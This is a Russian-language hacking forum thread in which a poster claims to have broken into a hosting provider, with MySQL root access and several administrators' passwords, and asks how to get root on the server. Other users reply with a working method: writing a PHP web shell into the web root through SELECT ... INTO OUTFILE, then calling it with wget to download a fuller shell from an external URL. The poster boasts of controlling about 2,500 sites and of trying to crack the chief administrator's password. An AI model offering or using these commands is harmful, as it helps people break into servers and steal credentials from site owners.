Ребятишки, я вот взломал хостинг, там идиоты админы походу, есть у меня их пассы частично и рут к базе данных. Я могу получить рута на серваке?
#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
SELECT '<? system($_GET[cmd]); ?>' INTO OUTFILE 'ЗДЕСЬ локальная ДИРЕКТОРИЯ В КоТОРУЮ ТЫ ХОЧЕШЬ ПОМЕСТИТЬ ШЕЛЛ' НЕзабудь про кавычки!Пример дириктории /www/site/users/htdocs/shell.php
Попробую. Там явно phpmyadmin (который любезные администраторы предоставили) глючный. Я вот думаю, мне мучаться с root'ом, или нет? И так есть управление 2,5 тысячами сайтов И пароли администраторов... Правда, не все пароли.
А еще!После того как ты выполнишь эту команду файл примет вид: shell.php,это командер!Чтобы залить полноценный шел надо сделать так!http://сайт/директория/shell.php?cmd=wget http://И адрес где лежит полноценный шелл!Можешь взять вот этот http://vrms.narod.ru/remview.php
Ха-ха Это точно. Ну, сейчас у горе-хостера сервак лежит, не могу попробовать. А когда попробую - отпишусь
select '<?php system($_GET[cmd]); ?>' into outfile 'path_to_your_shell' не катит? Если пишет "access denied to user ...@...", то облом
Пишет "You have an error in your mysql syntax on line 1 near ' ' ", что бы я не писал А вообще, оказалось, что кто-то до меня там уже что-то пытался сделать, т.к. я нашел там на одном из сайтов два руткита и три шелла. Однако, там стоят довольно отдаленные даты и не похоже, что у этого хакера что-то вышло. Я все никак не расшифрую пасс самого главного админа У же есть пароли 4-х главных администраторов